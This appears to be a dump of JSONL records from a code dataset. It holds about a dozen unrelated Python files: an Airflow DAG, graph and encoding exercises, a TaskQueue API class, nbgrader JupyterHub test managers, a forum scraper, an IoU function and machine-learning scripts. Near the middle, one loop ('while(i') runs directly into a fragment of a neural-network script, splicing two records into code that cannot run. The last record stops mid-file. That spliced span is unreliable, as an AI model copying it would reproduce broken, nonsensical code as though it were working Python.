spotify_weekly_email_job import spotify_weekly_email_function\n\nmy_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'start_date': datetime.now(), # note: Airflow recommends a fixed start_date rather than datetime.now()\n 'email': ['test@test.com'],\n 'email_on_failure': True,\n 'email_on_retry': True,\n 'retries': 1,\n 'retry_delay': timedelta(minutes=5),\n}\nmy_dag = DAG(\n 'spotify_email_dag',\n default_args = my_args,\n description= 'Spotify Weekly Email',\n #schedule_interval= '* * * * *'\n schedule_interval='@once'\n )\n\n\nrun_email = PythonOperator(\n task_id='spotify_weekly_email',\n python_callable= spotify_weekly_email_function,\n dag=my_dag\n)\n","sub_path":"api/dags/spotify_weekly_email_dag.py","file_name":"spotify_weekly_email_dag.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"266655403","text":"# Python program to print topological sorting of a DAG\nfrom collections import defaultdict\n\n\n# Class to represent a graph\nclass Graph:\n def __init__(self, vertices):\n self.graph = defaultdict(list) # dictionary containing adjacency List\n self.V = vertices # number of vertices\n\n # function to add an edge to graph\n def addEdge(self, from_v, to_v):\n self.graph[from_v].append(to_v)\n\n # A recursive function used by topologicalSort\n\n def topologicalSortUtil(self, vertex, visited, stack):\n\n # Mark the current node as visited.\n visited[vertex] = True\n\n # Recur for all the vertices adjacent to this vertex\n for i in self.graph[vertex]:\n if not visited[i]: # if not visited yet, recurse\n self.topologicalSortUtil(i, visited, stack)\n\n # Push current vertex to stack which stores result\n stack.insert(0, vertex) # inserting at index 0 keeps the finished vertices in topological order\n\n # The function to do Topological Sort. It uses recursive\n\n # topologicalSortUtil()\n def topologicalSort(self):\n # Mark all the vertices as not visited\n visited = [False] * self.V\n stack = []\n\n # Call the recursive helper function to store Topological\n # Sort starting from all vertices one by one\n for i in range(self.V): # iterate over every vertex\n if not visited[i]: # run the helper for each vertex that has not been visited yet\n self.topologicalSortUtil(i, visited, stack)\n print(stack)\n\n\ng = Graph(6)\ng.addEdge(5, 2)\ng.addEdge(5, 0)\ng.addEdge(4, 0)\ng.addEdge(4, 1)\ng.addEdge(2, 3)\ng.addEdge(3, 1)\n\nprint(\"Following is a Topological Sort of the given graph\")\ng.topologicalSort()\n","sub_path":"seung/topological_sort_test.py","file_name":"topological_sort_test.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"496392191","text":"#!/usr/bin/env python\n\"\"\"\nBase class of the TQ API.\n\"\"\"\n\n__all__ = []\n\n\n\nimport logging\nimport threading\nimport time\nfrom TQComp.TQComp import TQComp\nfrom WMCore.Configuration import Configuration\nfrom WMCore.Database.DBFactory import DBFactory\nfrom WMCore.Database.Transaction import Transaction\nfrom WMCore.WMFactory import WMFactory\n\n\nclass TQApi(object):\n \"\"\"\n Base class of the TQ API. 
It provides the basics to construct\n an object with access to the TQ databases.\n\n Other classes can extend this one to offer further methods\n that manage the TQ.\n \"\"\"\n\n def __init__(self, logger, tqRef, dbIface = None):\n \"\"\"\n Constructor.\n\n Param logger is a python logger (required).\n\n Param tqRef is either a reference to the TQComp object we want\n to interface with (preferred), or the WMCore.Configuration object \n that was used to configure it.\n\n Param dbIface is optional. If used, it must be a valid \n WMCore.Database.Transaction object pointing to the DB interface\n that the TQComp object is using. Otherwise, such interface\n will be retrieved/reconstructed from the tqRef.\n\n Example of how to create an API from a WMCore component:\n from TQComp.Apis.TQSubmitApi import TQSubmitApi\n from TQComp.Apis.TQApiData import Task\n\n myThread = threading.currentThread()\n tqApi = TQApi(myThread.logger, self.config, \\\n myThread.transaction)\n\n How to do create an API from the python interpreter:\n >>> from TQComp.Apis.TQStateApi import TQStateApi\n >>> import logging\n >>> mylogger = logging.getLogger(\"tqclient\")\n >>> confFile = \"/pool/TaskQueue/cms_code/WMCore-conf.py\"\n >>> from WMCore import Configuration\n >>> myconfig = Configuration.loadConfigurationFile(confFile)\n >>> api = TQApi(mylogger, myconfig, None)\n\n For many practical purposes, one can instead use the 'tqclient'\n command line interface.\n \"\"\"\n self.logger = logger\n self.logger.debug(\"Creating TQApi with params: %s, %s, %s\" % \\\n (logger, type(tqRef), dbIface))\n self.transaction = None \n if dbIface:\n self.transaction = dbIface\n\n if isinstance(tqRef, TQComp):\n self.tq = tqRef\n self.conf = None\n self.dialect = self.tq.dialect\n if not self.transaction:\n self.transaction = self.tq.transaction\n \n elif isinstance(tqRef, Configuration):\n self.tq = None\n self.conf = tqRef\n self.dialect = self.conf.CoreDatabase.dialect\n if not self.transaction:\n options = {}\n coreSect = self.conf.CoreDatabase\n if hasattr(coreSect, \"socket\"):\n options['unix_socket'] = coreSect.socket\n if hasattr(coreSect, \"connectUrl\"):\n dbStr = coreSect.connectUrl\n else:\n dbStr = self.dialect + '://' + coreSect.user + \\\n ':' + coreSect.passwd+\"@\"+coreSect.hostname+'/'+\\\n coreSect.name\n self.dbFactory = DBFactory(self.logger, dbStr, options)\n self.dbi = self.dbFactory.connect()\n self.transaction = Transaction(self.dbi)\n\n else:\n msg = \"tqRef should be instance of TQComp or WMCore.Configuration\"\n raise ValueError(msg)\n\n # Make things available for Queries (or others relying in myThread)\n myThread = threading.currentThread()\n if not hasattr(myThread, 'transaction'):\n myThread.transaction = self.transaction\n if not hasattr(myThread, 'logger'):\n myThread.logger = self.logger\n if not hasattr(myThread, 'dbi'):\n myThread.dbi = self.dbi\n\n if self.dialect == 'mysql':\n self.dialect = 'MySQL'\n self.factory = WMFactory(\"default\", \\\n \"TQComp.Database.\" + self.dialect)\n\n self.queries = self.factory.loadObject(\"Queries\")\n\n\n","sub_path":"src/python/WMCore/TaskQueue/TQComp/Apis/TQApi.py","file_name":"TQApi.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"473868784","text":"''''\r\nThis week we will modify our If Statement program to add a function to do the heavy lifting.\r\nModify your IF Statement program to add a function. 
This function will perform the cost calculation.\r\nThe function will have two parameters (feet and price). When you call the function, you will pass two arguments to the function;\r\n feet of fiber to be installed and the cost (remember that price is dependent on the number of feet being installed).\r\n\r\nYou probably should have the following:\r\nYour program must have a header. Use the SIU Edwardsville Programming Guide for guidance.\r\nA welcome message\r\nA function with two parameters\r\nA call to the function\r\nThe application should calculate the cost based upon the number of feet being ordered\r\nA printed message displaying the company name and the total calculated cost\r\n'''\r\n\r\n# Name: Dan Wiltse\r\n# Date: 9/15/2019\r\n# Course: DSC510\r\n# Assign #: 3.1 Programming Assignment\r\n#Purpose: This program is designed to allow a user to enter their company name and amount of fiber optic cable needed\r\n# (in feet) in order to calculate the cost to install the requested amount of fiber optic cable. It will also\r\n# adjust the cost based on the bulk discount for amount needed over 100 feet.\r\n\r\n\r\n\r\n\r\n #Welcome statement to user\r\nprint('Welcome to my cable pricing calculator program!')\r\n#Purpose statement\r\nprint('This program will allow a user to calculate the installation cost of fiber optic cable')\r\nprint(\"\\n\")\r\n#Collect company name and amount of cable needed from user using a function parameter\r\n\r\ncompanyname = input('Please enter the name of your company?')\r\n#have user input amount of cable\r\ncablelength = input('Please enter how many feet of fiber optic cable do you need?')\r\n#testing out the try statement to deal with non-numerical entries for cable length\r\ntry:\r\n cablelength = float(cablelength)\r\nexcept:\r\n print('The number entered was not an integer. Please run the code again and enter a numerical value.')\r\n\r\n#Calculate the cost of cable needed based on bulk discount. 
Rounding to 2 decimal places.\r\ndef MyFunction(feet, price):\r\n # Determine the cost per foot: the base price applies up to 100 feet,\r\n # longer runs get the bulk discount\r\n if feet <= 100:\r\n bulkcost = price\r\n elif feet > 100 and feet <= 250:\r\n bulkcost = 0.80\r\n elif feet > 250 and feet <= 500:\r\n bulkcost = 0.70\r\n else:\r\n bulkcost = 0.50\r\n # Calculate the total installation cost, rounded to 2 decimal places\r\n cablecalculation = round(float(feet) * bulkcost, 2)\r\n\r\n # Final output below\r\n print('Receipt for:', companyname)\r\n print('Number of Feet of Cable Installed:', feet)\r\n print('Cost per foot (bulk discount over 100 feet):', bulkcost)\r\n print('Calculated Cost:', bulkcost, '*', feet, 'feet of cable =', cablecalculation, 'dollars')\r\n print('The total fiber optic cable installation cost for', companyname, 'for', feet,\r\n 'feet of cable will be', cablecalculation, 'dollars.')\r\n\r\n# Call the function with the feet of cable ordered and the base price per foot;\r\n# the original call used the undefined names cablelength2 and bulkcost2\r\nMyFunction(cablelength, 0.87)\r\n","sub_path":"PyCharm Scripts/DSC510-Week4/dan_wiltse_DSC510_Week4.py","file_name":"dan_wiltse_DSC510_Week4.py","file_ext":"py","file_size_in_byte":3853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"383499662","text":"# author: Pasan Fernando\n# Date: 06/15/16\n# Used to replace the character state of data matrix file for the taxa with inferred presence\n\n#################################################################################################\n\n\npec = []\npelvic =[]\n\n''' To run this code, taxa with inferred presence states for pectoral fin (pectoralinferred.txt) and pelvic fin (pelvicinferred.txt)\nmust be provided as separate lists. 
These lists are generated from another code that extracts this information from pectoral and pelvic\nxml files'''\n\n# reading the pelvic fin inferred presence list\npl = open('pelvicinferred.txt', 'r')\n\nfor line in pl:\n if line != '\\n':\n line = line.strip()\n # removing the naming errors\n line = line.replace(' ','_')\n line = line.replace('(', '')\n line = line.replace(')', '')\n pelvic.append(line)\n\n\n# print pelvic\n# print len(pelvic)\n\n# reading the pectoral fin inferred presence list\npc = open('pectoralinferred.txt', 'r')\n\nfor line in pc:\n if line != '\\n':\n line = line.strip()\n line = line.replace(' ','_')\n line = line.replace('(', '')\n line = line.replace(')', '')\n pec.append(line)\n\n#print len(pec)\n\npela=[]\npeca=[]\n\n# reading the input data matrix for the code\nm = open('conflicts_removed_datamatrix.txt', 'r')\n\n# defining the output matrix of the code\nout = open('modified_inferredadded_matrix.txt', 'wb+')\n\n# writing the header of the output matrix with two additional columns to distinguish inferred data\nout.write('taxa_name\\tpectoral_fin\\tpelvic_fin\\tpectoral_inferred\\tpelvic_inferred\\n')\n\n# reading the input and selects the states with inferred presence which are represented by '2' hereafter\nfor line in m:\n if (line != '\\n') and ( 'taxa_name' not in line):\n line = line.strip()\n a = line.split('\\t')\n a[0] =a[0].strip('\\'')\n\n a1 = a[0] # this line was required to keep the parenthesis within taxa names in the final VTO matrix\n a[0] = a[0].replace(' ', '_')\n a[0] = a[0].replace('(', '')\n a[0] = a[0].replace(')', '')\n if a[0] in pec:\n x = '2'\n peca.append(a[0])\n else:\n x = a[1]\n\n if a[0] in pelvic:\n y ='2'\n pela.append(a[0])\n\n else:\n y= a[2]\n\n out.write('%s\\t%s\\t%s\\t%s\\t%s\\n'%(a1,a[1],a[2],x,y))\n\n\n\n# print pela\n# print peca\n\n#################################################################################################\n# generating statistics for inferred data\n\n# defining another output file for inferred state statistics\nout1 = open('inferredstats.txt', 'wb+')\n\n# writing the number of taxa with inferred presence state\nout1.write('inferred presence for pectoral fin: %i\\n'%len(pec))\nout1.write('inferred presence for pelvic fin: %i\\n'%len(pelvic))\n\n\n# Counting the unmapped taxa with inferred presence; the unmapped taxa are mismatched between pectoral and pelvic xml files\n#with the input matrix with various naming errors; usually there are only one or two taxa like this; they are due to the presence\n# of quot instead of actual \"\" in the taxa name\n\npeld = set(pelvic) - set(pela)\npeld =list(peld)\n\npecd = set(pec) - set(peca)\npecd = list(pecd)\n\nout1.write('unmapped data for pectoral fin: %i\\n'%len(pecd))\nfor i in pecd:\n out1.write('%s\\n'%i)\nout1.write('\\n')\nout1.write('\\n')\nout1.write('unmapped data for pelvic fin %i\\n'%len(peld))\nfor i in peld:\n out1.write('%s\\n'%i)","sub_path":"4.inferredprecensereplace/inferredpresencereplace.py","file_name":"inferredpresencereplace.py","file_ext":"py","file_size_in_byte":3472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"67967866","text":"# -*- coding:utf-8 -*-\nimport torch\n\n\ndef get_iou(box, boxes, ismin=False, iscuda=False, delta=1e-4):\n \"\"\"\n :param box: torch.Tensor([x1, y1, x2, y2, ...])\n :param boxes: the set of candidate box ---> dim = 2\n :param ismin: for state of containment between init box and candidate boxes\n :param iscuda: the data is on GPU\n \"\"\"\n device 
= torch.device(\"cuda\") if iscuda else torch.device(\"cpu\")\n box, boxes = box.to(device), boxes.to(device)\n\n x1 = torch.max(box[0], boxes[:, 0])\n y1 = torch.max(box[1], boxes[:, 1])\n x2 = torch.min(box[2], boxes[:, 2])\n y2 = torch.min(box[3], boxes[:, 3])\n\n box_area = (box[2] - box[0]) * (box[3] - box[1])\n boxes_areas = (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1])\n # clamp the width and height at zero so disjoint boxes yield zero intersection\n inter_area = torch.clamp(x2 - x1, min=0) * torch.clamp(y2 - y1, min=0)\n # the union must subtract the intersection, otherwise the overlap is counted twice\n union_areas = box_area + boxes_areas - inter_area\n if ismin:\n return inter_area/(torch.min(box_area, boxes_areas) + delta)\n return inter_area/(union_areas + delta)\n\n\n\n# if __name__ == '__main__':\n# box = torch.Tensor([1.0, 1.0, 2.0, 2.0])\n# boxes = torch.Tensor([\n# [1.25, 1.25, 1.75, 1.75],\n# [1.25, 1.25, 2.0, 2.0],\n# [1.25, 1.25, 2.75, 2.75],\n# [1.75, 1.75, 5.0, 5.0],\n# ])\n# print(\"iou:\", get_iou(box, boxes))","sub_path":"Utils/iou.py","file_name":"iou.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"94140421","text":"import time\nimport os\nimport subprocess as sp\nimport sys\nimport signal\n\nfrom textwrap import dedent\nfrom .. import start_subprocess, copy_coverage_files, get_free_ports\n\n# to add a new manager for the tests, you MUST add it to this list of classes\n__all__ = [\n \"DefaultManager\",\n \"HubAuthManager\",\n \"HubAuthCustomUrlManager\",\n \"HubAuthNotebookServerUserManager\",\n \"HubAuthSSLManager\"\n]\n\nclass DefaultManager(object):\n\n nbgrader_config = dedent(\n \"\"\"\n c = get_config()\n c.NoAuth.nbserver_port = {nbserver_port}\n c.FormgradeApp.port = {port}\n \"\"\"\n )\n\n _base_url = \"\"\n _base_formgrade_url = \"http://localhost:{port}/\"\n _base_notebook_url = \"http://localhost:{nbserver_port}/notebooks/\"\n\n def __init__(self, tempdir, startup_wait=5, shutdown_wait=5):\n self.tempdir = tempdir\n self.startup_wait = startup_wait\n self.shutdown_wait = shutdown_wait\n self.formgrader = None\n self.jupyterhub = None\n self.env = os.environ.copy()\n\n ports = get_free_ports(5)\n self.port = ports[0]\n self.nbserver_port = ports[1]\n self.hub_port = ports[2] # not always used\n self.proxy_port = ports[3] # not always used\n self.hubapi_port = ports[4] # not always used\n\n print(\"port: {}\".format(self.port))\n print(\"nbserver_port: {}\".format(self.nbserver_port))\n print(\"hub_port: {}\".format(self.hub_port))\n print(\"proxy_port: {}\".format(self.proxy_port))\n print(\"hubapi_port: {}\".format(self.hubapi_port))\n\n self.base_url = self._base_url.format(\n hub_port=self.hub_port)\n self.base_formgrade_url = self._base_formgrade_url.format(\n port=self.port,\n hub_port=self.hub_port)\n self.base_notebook_url = self._base_notebook_url.format(\n nbserver_port=self.nbserver_port,\n hub_port=self.hub_port)\n\n def _write_config(self):\n with open(\"nbgrader_config.py\", \"w\") as fh:\n fh.write(self.nbgrader_config.format(\n tempdir=self.tempdir,\n port=self.port,\n nbserver_port=self.nbserver_port,\n hub_port=self.hub_port,\n hubapi_port=self.hubapi_port,\n proxy_port=self.proxy_port))\n\n def _start_jupyterhub(self):\n pass\n\n def _start_formgrader(self):\n kwargs = dict(env=self.env)\n if sys.platform == 'win32':\n kwargs['creationflags'] = sp.CREATE_NEW_PROCESS_GROUP\n\n self.formgrader = start_subprocess(\n [sys.executable, \"-m\", \"nbgrader\", \"formgrade\"],\n **kwargs)\n\n time.sleep(self.startup_wait)\n\n def start(self):\n self._write_config()\n self._start_jupyterhub()\n 
self._start_formgrader()\n\n def _stop_formgrader(self):\n if sys.platform == 'win32':\n self.formgrader.send_signal(signal.CTRL_BREAK_EVENT)\n else:\n self.formgrader.terminate()\n\n # wait for the formgrader to shut down\n for i in range(int(self.shutdown_wait / 0.1)):\n retcode = self.formgrader.poll()\n if retcode is not None:\n break\n time.sleep(0.1)\n\n # not shutdown, force kill it\n if retcode is None:\n self.formgrader.kill()\n\n self.formgrader.wait()\n\n def _stop_jupyterhub(self):\n pass\n\n def stop(self):\n self._stop_formgrader()\n self._stop_jupyterhub()\n copy_coverage_files()\n\n\nclass HubAuthManager(DefaultManager):\n\n nbgrader_config = dedent(\n \"\"\"\n c = get_config()\n c.NbGrader.course_id = 'course123ABC'\n c.FormgradeApp.port = {port}\n c.FormgradeApp.authenticator_class = \"nbgrader.auth.hubauth.HubAuth\"\n c.HubAuth.graders = [\"foobar\"]\n c.HubAuth.notebook_url_prefix = \"class_files\"\n c.HubAuth.proxy_port = {proxy_port}\n c.HubAuth.hubapi_port = {hubapi_port}\n c.HubAuth.hub_port = {hub_port}\n \"\"\"\n )\n\n jupyterhub_config = dedent(\n \"\"\"\n c = get_config()\n c.JupyterHub.authenticator_class = 'nbgrader.tests.formgrader.fakeuser.FakeUserAuth'\n c.JupyterHub.spawner_class = 'nbgrader.tests.formgrader.fakeuser.FakeUserSpawner'\n c.Authenticator.admin_users = set(['admin'])\n c.Authenticator.whitelist = set(['foobar', 'baz'])\n c.JupyterHub.log_level = \"WARN\"\n c.JupyterHub.confirm_no_ssl = True\n c.JupyterHub.port = {hub_port}\n c.JupyterHub.proxy_api_port = {proxy_port}\n c.JupyterHub.hub_port = {hubapi_port}\n \"\"\"\n )\n\n _base_url = \"http://localhost:{hub_port}\"\n _base_formgrade_url = \"http://localhost:{hub_port}/hub/nbgrader/course123ABC/\"\n _base_notebook_url = \"http://localhost:{hub_port}/user/foobar/notebooks/class_files/\"\n\n def _write_config(self):\n super(HubAuthManager, self)._write_config()\n pth = os.path.join(self.tempdir, \"jupyterhub_config.py\")\n with open(pth, \"w\") as fh:\n fh.write(self.jupyterhub_config.format(\n tempdir=self.tempdir,\n hub_port=self.hub_port,\n hubapi_port=self.hubapi_port,\n proxy_port=self.proxy_port))\n\n def _start_jupyterhub(self, configproxy_auth_token='foo'):\n self.env['CONFIGPROXY_AUTH_TOKEN'] = configproxy_auth_token\n self.jupyterhub = start_subprocess(\n [sys.executable, \"-m\", \"jupyterhub\"],\n cwd=self.tempdir,\n env=self.env)\n\n time.sleep(self.startup_wait)\n\n def _start_formgrader(self, configproxy_auth_token='foo'):\n print(\"Getting token from jupyterhub\")\n token = sp.check_output(\n [sys.executable, '-m', 'jupyterhub', 'token', 'admin'],\n cwd=self.tempdir).decode().strip()\n self.env['JPY_API_TOKEN'] = token\n self.env['CONFIGPROXY_AUTH_TOKEN'] = configproxy_auth_token\n super(HubAuthManager, self)._start_formgrader()\n\n def _stop_jupyterhub(self):\n self.jupyterhub.terminate()\n\n # wait for the formgrader to shut down\n for i in range(int(self.shutdown_wait / 0.1)):\n retcode = self.jupyterhub.poll()\n if retcode is not None:\n break\n time.sleep(0.1)\n\n # not shutdown, force kill it\n if retcode is None:\n self.jupyterhub.kill()\n\n # remove database and cookie secret\n os.remove(os.path.join(self.tempdir, \"jupyterhub.sqlite\"))\n os.remove(os.path.join(self.tempdir, \"jupyterhub_cookie_secret\"))\n\n\nclass HubAuthCustomUrlManager(HubAuthManager):\n\n nbgrader_config = dedent(\n \"\"\"\n c = get_config()\n c.NbGrader.course_id = 'course123ABC'\n c.FormgradeApp.port = {port}\n c.FormgradeApp.authenticator_class = \"nbgrader.auth.hubauth.HubAuth\"\n 
c.HubAuth.graders = [\"foobar\"]\n c.HubAuth.notebook_url_prefix = \"class_files\"\n c.HubAuth.remap_url = '/hub/grader'\n c.HubAuth.proxy_port = {proxy_port}\n c.HubAuth.hubapi_port = {hubapi_port}\n c.HubAuth.hub_port = {hub_port}\n \"\"\"\n )\n\n _base_formgrade_url = \"http://localhost:{hub_port}/hub/grader/\"\n\n\nclass HubAuthNotebookServerUserManager(HubAuthManager):\n\n nbgrader_config = dedent(\n \"\"\"\n c = get_config()\n c.NbGrader.course_id = 'course123ABC'\n c.FormgradeApp.port = {port}\n c.FormgradeApp.authenticator_class = \"nbgrader.auth.hubauth.HubAuth\"\n c.HubAuth.graders = [\"foobar\", \"quux\"]\n c.HubAuth.notebook_url_prefix = \"class_files\"\n c.HubAuth.notebook_server_user = 'quux'\n c.HubAuth.proxy_port = {proxy_port}\n c.HubAuth.hubapi_port = {hubapi_port}\n c.HubAuth.hub_port = {hub_port}\n \"\"\"\n )\n\n jupyterhub_config = dedent(\n \"\"\"\n c = get_config()\n c.JupyterHub.authenticator_class = 'nbgrader.tests.formgrader.fakeuser.FakeUserAuth'\n c.JupyterHub.spawner_class = 'nbgrader.tests.formgrader.fakeuser.FakeUserSpawner'\n c.JupyterHub.admin_access = True\n c.JupyterHub.log_level = \"WARN\"\n c.JupyterHub.confirm_no_ssl = True\n c.JupyterHub.port = {hub_port}\n c.JupyterHub.proxy_api_port = {proxy_port}\n c.JupyterHub.hub_port = {hubapi_port}\n c.Authenticator.admin_users = set(['admin'])\n c.Authenticator.whitelist = set(['foobar', 'baz', 'quux'])\n \"\"\"\n )\n\n _base_notebook_url = \"http://localhost:{hub_port}/user/quux/notebooks/class_files/\"\n\n\nclass HubAuthSSLManager(HubAuthManager):\n\n nbgrader_config = dedent(\n \"\"\"\n c = get_config()\n c.NbGrader.course_id = 'course123ABC'\n c.FormgradeApp.ip = '127.0.0.1'\n c.FormgradeApp.port = {port}\n c.FormgradeApp.authenticator_class = \"nbgrader.auth.hubauth.HubAuth\"\n c.HubAuth.graders = [\"foobar\"]\n c.HubAuth.notebook_url_prefix = \"class_files\"\n c.HubAuth.hub_base_url = \"https://localhost:{hub_port}\"\n c.HubAuth.proxy_port = {proxy_port}\n c.HubAuth.hubapi_port = {hubapi_port}\n c.HubAuth.hub_port = {hub_port}\n \"\"\"\n )\n\n jupyterhub_config = dedent(\n \"\"\"\n c = get_config()\n c.JupyterHub.authenticator_class = 'nbgrader.tests.formgrader.fakeuser.FakeUserAuth'\n c.JupyterHub.spawner_class = 'nbgrader.tests.formgrader.fakeuser.FakeUserSpawner'\n c.Authenticator.admin_users = set(['admin'])\n c.Authenticator.whitelist = set(['foobar', 'baz'])\n c.JupyterHub.ssl_cert = '{tempdir}/jupyterhub_cert.pem'\n c.JupyterHub.ssl_key = '{tempdir}/jupyterhub_key.pem'\n c.JupyterHub.log_level = \"WARN\"\n c.JupyterHub.port = {hub_port}\n c.JupyterHub.proxy_api_port = {proxy_port}\n c.JupyterHub.hub_port = {hubapi_port}\n \"\"\"\n )\n\n _base_url = \"https://localhost:{hub_port}\"\n _base_formgrade_url = \"https://localhost:{hub_port}/hub/nbgrader/course123ABC/\"\n _base_notebook_url = \"https://localhost:{hub_port}/user/foobar/notebooks/class_files/\"\n\n def _start_jupyterhub(self, *args, **kwargs):\n sp.check_call([\n \"openssl\",\n \"req\", \"-x509\",\n \"-newkey\", \"rsa:2048\",\n \"-keyout\", \"{}/jupyterhub_key.pem\".format(self.tempdir),\n \"-out\", \"{}/jupyterhub_cert.pem\".format(self.tempdir),\n \"-days\", \"1\",\n \"-nodes\",\n \"-batch\"\n ], cwd=self.tempdir)\n\n super(HubAuthSSLManager, self)._start_jupyterhub(*args, **kwargs)\n","sub_path":"nbgrader/tests/formgrader/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":10546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"466523161","text":"from bs4 import 
BeautifulSoup\nimport re\n\n\nclass Parser(object):\n # parse the catalogue page into a list of entries\n def parserMenu(self, content):\n if content is None:\n return\n soup = BeautifulSoup(content, 'html')\n menus = self.__get_menus(soup)\n return menus\n\n # get the URL of the next page\n def get_next_url(self, content):\n if content is None:\n return\n soup = BeautifulSoup(content, 'html')\n # href=\"/list.jsp?item=16&nextid=1554822262000\"\n next_a = soup.find_all('a', href=re.compile(r\"/list.jsp\\?item=16&nextid=.+\"))\n if not next_a: # find_all returns a list, never None; an empty list means there is no next page\n print('没有下一页了')\n return None\n next_url = next_a[0]['href']\n print('下一页地址:', next_url)\n return next_url\n\n # get the list of catalogue entries\n def __get_menus(self, soup):\n menus = []\n trs = soup.find_all('tr')\n # loop to collect the title, author, read count, address, reply count and update time\n for tr in trs:\n data = {}\n # get the title\n title_a = tr.find('a')\n if title_a is None:\n continue\n # print(title_a)\n title = title_a.get_text()\n # strip line breaks\n title = title.replace(\"\\t\", \"\")\n title = title.replace(\"\\n\", \"\")\n title = title.replace(\"\\r\", \"\")\n print(title)\n data['title'] = title\n # get the author\n author_a = tr.find('a', class_='author')\n if author_a is None:\n continue\n # print(author_a)\n author = author_a.get_text()\n # print(author)\n data['author'] = author\n # get the read count\n td_array = tr.find_all('td')\n # print(td_array)\n if len(td_array) < 5:\n continue\n read_a = td_array[2]\n # print(read_a)\n read = read_a.get_text()\n data['read'] = read\n # print(read)\n # get the reply count\n review_a = td_array[3]\n # print(review_a)\n review = review_a.get_text()\n data['review'] = review\n # print(review)\n # get the update time\n time_a = td_array[4]\n # print(time_a)\n time = time_a.get_text()\n # print(time)\n data['time'] = time\n\n print(data)\n menus.append(data)\n\n return menus\n","sub_path":"tianya/Parser.py","file_name":"Parser.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"253435677","text":"class Solution:\n\n ## SOLUTION 1\n def runLengthEncoding1(self, string):\n # Time O(n^2) [concatenating with + for string]\n # Space O(n)\n\n res = \"\"\n prevChar = string[0]\n wordCount = 1\n\n for i in range(1, len(string)):\n\n currChar = string[i]\n if currChar == prevChar:\n wordCount += 1\n\n else:\n if wordCount > 9:\n res += (\"9\" + prevChar) * (wordCount // 9)\n if wordCount % 9: # skip the remainder when it is zero, otherwise a spurious \"0X\" is emitted\n res += str(wordCount % 9) + prevChar\n\n else:\n res += str(wordCount) + prevChar\n\n prevChar = currChar\n wordCount = 1\n\n ## Handling the last run.\n if wordCount > 9:\n res += (\"9\" + prevChar) * (wordCount // 9)\n if wordCount % 9: # same zero-remainder guard as above\n res += str(wordCount % 9) + prevChar\n\n else:\n res += str(wordCount) + prevChar\n\n return res\n\n ## SOLUTION 2\n def runLengthEncoding2(self, string):\n\n # Time O(n) || Space O(n)\n encodedString = []\n currentCount = 1\n\n for i in range(1, len(string)):\n\n currChar = string[i]\n prevChar = string[i - 1]\n\n if currChar != prevChar or currentCount == 9:\n\n encodedString.append(str(currentCount))\n encodedString.append(prevChar)\n currentCount = 0\n\n currentCount += 1\n\n encodedString.append(str(currentCount))\n encodedString.append(string[-1])\n\n return \"\".join(encodedString)\n\n\nif __name__ == \"__main__\":\n\n print(Solution().runLengthEncoding1(\"AAAAAAAAAAAAABBCCCCDD\"))\n print(Solution().runLengthEncoding2(\"AAAAAAAAAAAAABBCCCCDD\"))","sub_path":"Easy/runLengthEncoding.py","file_name":"runLengthEncoding.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"543093051","text":"import json\n\nfrom 
config import BASE_DIR\n\n\ndef read_cart_data():\n with open(BASE_DIR + \"/data/order_data.json\", encoding=\"utf-8\") as f:\n data = json.load(f)\n # 声明一个空列表\n data_list = list()\n for i in data.values():\n data_list.append((\n i.get('expect')))\n\n print(data_list)\n\n\nread_cart_data()\n","sub_path":"data/read_order_data.py","file_name":"read_order_data.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"94197211","text":"a = input()\nx = a.replace(\" \",\"\")\ni = 0\nj = -1\nwhile(i0.5 else 0 for x in A2.reshape(-1,1)] ).reshape(A2.shape)\n return predictions\n\ni = 0.5\nj = 10\nwhile i == 0.5:\n while j == 10:\n #name = input(\"input the file name for training:\")\n X,Y = load_dataset('UCI.txt')\n if 0 :\n print(\"the shape of X&Y:\",X.shape,Y.shape)\n print(\"layer sizes:\",layer_sizes(X,Y),\"and default hidden layer size is 4\")\n n_x, n_y = layer_sizes(X, Y)\n parameters = initialize_parameters(n_x, n_y)\n print(parameters)\n A2, cache = forward_propagation(X, parameters)\n\n parameters = nn_model(X, Y, 4, 1.5, 500, True)\n\n #name = input(\"input the file name for predict:\")\n X,Y = load_dataset('UCI_test.txt')\n predictions = predict(parameters, X)\n print ('Accuracy: %d' % float((np.dot(Y,predictions.T) + np.dot(1-Y,1-predictions.T))/float(Y.size)*100) + '%')\n \n j += 10\n i += 0.5\n j = 10\n","sub_path":"deepin/others/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":4575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"54584167","text":"import pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.tree import DecisionTreeClassifier\r\n\r\n# --------------------------------------Data Preprocessing--------------------------------------\r\ndata_frame = pd.read_csv(\"C:\\\\bank-additional-full.csv\", sep=\";\")\r\ncols = ['job', 'marital', 'education', 'default', 'housing', 'loan', 'contact', 'month', 'day_of_week']\r\ninput_raw = data_frame[cols] # type: DataFrame\r\nX_df = pd.get_dummies(input_raw) # 